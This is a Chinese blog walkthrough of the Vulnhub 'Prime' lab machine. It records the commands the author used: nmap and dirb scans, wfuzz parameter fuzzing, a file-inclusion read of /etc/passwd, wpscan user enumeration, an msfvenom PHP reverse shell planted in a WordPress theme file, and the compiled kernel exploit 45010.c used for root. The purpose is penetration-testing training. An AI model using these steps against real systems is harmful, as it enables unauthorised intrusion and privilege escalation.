Prime靶场

已于 2022-05-02 18:43:19 修改
阅读量478 收藏 2
点赞数 1
分类专栏: Vulnhub靶场 文章标签: 安全 linux web安全
于 2022-05-02 18:40:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcl20010/article/details/124544605
版权

prime靶场(vulnhub)

靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA
提取码:ap5g

目录

X shell 连接 kali:
#首先查看kali是否打开了22端口。ssh协议:ssh远程连接 
netstat -an|grep 22
#打开服务   
service ssh start
1. 主机发现:
#采用nmap
nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行ping扫描,nmap发送ICMP和TCP报文,高效
#看ip和对应的mac可以确定ip
2.端口扫描:
#采用nmap进行端口扫描
nmap -p 1-65535 -A 192.168.128.129  #-p表示端口,-A表示强力扫描
3. 目录扫描:
#可以先尝试常见的文件目录
config.php
password.txt
robots.txt
src.zip
#kali工具dirb
dirb http://192.168.128.129   #这里我对比了御剑,御剑效果不太行,除非再给一个目录深入扫描
#上面是简单扫描,可以指定后缀扫描 -X .php,.txt
dirb http://192.168.128.129 -X .txt,.php,.zip
#wfuzz
1.目录扫描
2.密码爆破
3.找参数      #如果猜不到参数,把参数进行测试。
4.压力测试
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.128.129/index.php?FUZZ
#FUZZ表示要模糊测试的位置
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.128.129/index.php?FUZZ
#添加的-hw表示屏蔽特定的长度的字    这里过滤hh 也可以
4.利用信息
http://192.168.128.129/index.php?file=location.txt   #linux系统首先尝试/etc/passwd
http://192.168.128.129/image.php?secrettier360=/etc/passwd  #给了参数继续尝试/etc/passwd
遇到文本不清晰的,可以用kali的curl工具把它打开,保存编辑器也可以
curl http://192.168.128.129/image.php?secrettier360=/etc/passwd
http://192.168.128.129/image.php?secrettier360=/home/saket/password.txt
#wpscan 扫描wordpress的工具
wpscan --url http://192.168.128.129/wordpress/ --enumerate #枚举用户名
提权:Msfvenom学习总结
#在wordpress中Theme Editor可以直接改php代码,思路:一句话木马(不稳定),php的反弹连接(稳定)php-reverse-shell.php
#常见的操作步骤:
1.在kali攻击机上监听端口:nc  socat工具
2.在靶机上访问php
#kali中的msf可以实现对上述操作的合并:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.128.128 lport=7777 -o shell.php #注意是本地kali的ip
#得到的php反弹shell放在secret.php中,更新
#打开监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.128.128  
set lport 7777
exploit
#根据经验找到wordpress的文件,写入在wordpress/wp-content/themes/twentynineteen/secret.php 执行进入meterpreter(不是交互式)
#meterpreter使用的自己的封装的命令,部分linux的命令可以使用
#提权的思路:
1.系统内核漏洞
2.history
3.sudo -l
#sysinfo得到系统内核版本,直接msfconsole查找对应版本漏洞
searchsploit 16.04 Ubuntu  #存在且漏洞是权限提升 对应文件linux/local/45010.c
cd /usr/share/exploitdb/exploits/linux/local/  #漏洞目录
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./  #复制脚本到主目录
gcc 45010.c -o 45010  #编译
upload /root/45010 /tmp/45010   #本地文件地址 --> 目标目录的 /tmp/45010   #tmp目录任何用户都有读写权限

#输入shell就进入靶场的shell   注意:这里不可以输入错误
 
cd /tmp
ls   #查看一下脚本是否保存编译成功
chmod +x 45010   #添加可执行权限
./45010                  #执行
whoami 
sudo passwd victor/root  修改密码就能进入

笔记本:(记录主要信息,配合步骤查看)

22 ssh
80  apach 2.4.18
/dev
http://192.168.128.129/javascript/   
http://192.168.128.129/wordpress/   #博客,有登录方式
http://192.168.128.129/image.php   #和图片一样
http://192.168.128.129/index.php
http://192.168.128.129/secret.txt #这里给了一个提示,用模糊测试 还有location.txt
                               利用fuzz得到file  ==>联想到文件包含漏洞
 secrettier360   #得到参数,利用在php上  查询自己有的php尝试

saket:x:1001:1001:find password.txt file in my directory:/home/saket:
得到follow_the_ippsec
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation  linux/local/45010.c
ke0hly
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Prime: 1靶机-Walkthrough
ins1ght的博客
09-18 2568
Prime: 1,中等难度的靶机。这个靶机让我深刻认识到信息收集的重要性。
vulnhub靶场-Prime1
ad12456的博客
03-30 2867
靶场练习,
Prime_Series靶场从探测到提权
cainsoftware的博客
09-15 1177
靶场开机就这 做的是NET的网卡跟我kali是一个网络 网络 192.168.34.0的 题目要求是同C段但是不知道ip地址 故直接nmap 扫描 目标服务器ip地址和开放服务和端口 没啥技术含量 可以看见ip为192.168.34.130的开放了 22 80 的2个服务 且网络容器是apache drib这里直接爆破目录 可见是一个wordpress的系统 二次扫描 -X 参数 [.txt][.php]的意思在爆破后缀添加 以.txt结尾和.php结...
靶场prime-1练习
qq_49091880的博客
10-20 871
靶场prime-1练习
Vulnhub之prime-1靶场[渗透测试]
qq_60115503的博客
08-29 1139
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透。
红队渗透靶场prime1.0(超详细!)
xf555er的博客
01-03 1357
WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客。它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻松地自定义网站的外观和功能。
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
详解使用VMware安装Permeate靶场系统实践
01-10
一、背景 不定时会做一些内训,会经常用到实验坏境;一开始搭建了一个docker容器,但考虑到不是所有学员都会使用docker,因此做了一个虚拟机版本,其实就是虚拟机里面安装了docker,为了方便大家迅速搭建坏境,总结...
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
【vulnhub 靶场prime1打靶记录
weixin_54603520的博客
05-09 316
【vulnhub 】---prime 靶场打靶记录
prime靶机CVE-2017-16695复现
weixin_51625802的博客
04-18 2303
prime靶机cve-45010复现 前期准备 使用nmap -sP 192.168.136.1/24 找出这台靶机的ip:192.168.136.128 本机ip:192.168.136.129 扫描目录 dirb 192.168.136.128 记住扫到的这个网站先留个伏笔 dirb 192.168.136.128 -X .php,.txt,.zip 扫出俩php网站和一个提示网站 http://192.168.136.128/image.php (C
【技术分享】Prime靶场
yy1715713348的博客
07-21 144
本篇文章记录了靶场prime的打靶过程,包括如何渗透、getshell和提权等环节。小星认为,此次打靶过程极具挑战性和趣味性,期待各位读者与小星交流探讨。
prime1靶场渗透
weixin_73562787的博客
07-18 288
靶场练习,详细全过程,prime1.0靶场
一次prime1靶场红队渗透实战,从主机发现到Linux内核漏洞提权
QQQPPPAAALLLZZZ的博客
07-03 949
使用了namp端口和存活主机扫描 ,dir目录扫描, FUZZ参数扫描 , MSF反弹连接,LINUX内核提权。完成了从访问页面->获取后台管理员权限 -> 获取操作系统权限 -> 获取root权限的全过程。
【vulnhub靶场PRIME:1打靶过程记录
didiplus
07-17 2927
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
红队靶场prime1靶机复现思路,wordpress反弹shell,shell执行ubuntu内核提权
m0_58116751的博客
05-18 1614
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发现什么可以利用的东西。
0x01--Prime_Series_Level-1靶场
growler67
09-16 1784
001–靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
靶机-primel
qq_45751902的博客
10-18 1503
靶机:primel系统:ubuntu没有密码,没有ip,nat模式攻击机:kali目标:获得root的flag。
Vega Prime深入解析与应用指南
"Vega Prime全面教程,涵盖了Vega与Vega Prime的比较,Vega Prime的工作流程,ACF文件结构,场景创建以及函数介绍等内容。教程特别强调了Vega Prime的跨平台特性,模块接口的改变,以及采用XML进行数据描述的优势。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值